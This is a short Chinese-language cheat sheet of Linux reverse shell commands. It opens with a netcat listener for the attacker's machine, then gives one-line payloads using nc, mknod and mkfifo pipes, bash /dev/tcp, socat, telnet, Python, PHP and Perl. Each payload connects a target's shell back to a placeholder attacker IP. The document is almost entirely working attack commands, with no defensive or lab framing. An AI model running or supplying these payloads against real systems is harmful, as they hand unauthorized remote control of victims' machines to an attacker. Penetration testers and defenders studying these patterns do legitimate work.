Linux反弹shell常见命令

Linux反弹shell常见命令

0x00 准备

# 攻击机上开启监听
nc -lvvnp 12345
# telnet双开要开两个

0x01 nc反弹

1. 当-e可用时

   1. nc xxx.xxx.xxx.xxx 12345 -e /bin/bash
      

2. mknod法

   1. mknod a p;bash -i 0<a 2>&1 | nc xxx.xxx.xxx.xxx 12345 >a
      

3. mkfifo法

   1. mkfifo a;bash -i 0<a 2>&1 | nc xxx.xxx.xxx.xxx 12345 >a
      

0x02 bash反弹

bash -i >& /dev/tcp/xxx.xxx.xxx.xxx/12345 0<&1

0x03 socat反弹

# 攻击机开启监听
socat tcp-listen:12346 -
# 目标建立链接
socat tcp-connect:xxx.xxx.xxx.xxx:12346 exec:"bash -li",pty,stderr,setsid,sigint,sane

0x04 telnet反弹

# mkfifo法
mkfifo a;bash -i 0<a 2>&1 | telnet xxx.xxx.xxx.xxx 12345 >a
mkfifo a;telnet xxx.xxx.xxx.xxx 12345 <a | /bin/bash -i >a 2>&1
# 第二种
telnet xxx.xxx.xxx.xxx 12345 | /bin/bash | telnet xxx.xxx.xxx.xxx 12346

0x05 python反弹

python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("xxx.xxx.xxx.xxx",12345));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'

0x06 php反弹

php -r '$s=fsockopen("xxx.xxx.xxx.xxx",12345);exec("/bin/bash -i <&3 >&3 2>&3");'

0x07 perl反弹

perl -e 'use Socket;$i="xxx.xxx.xxx.xxx";$p=12345;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'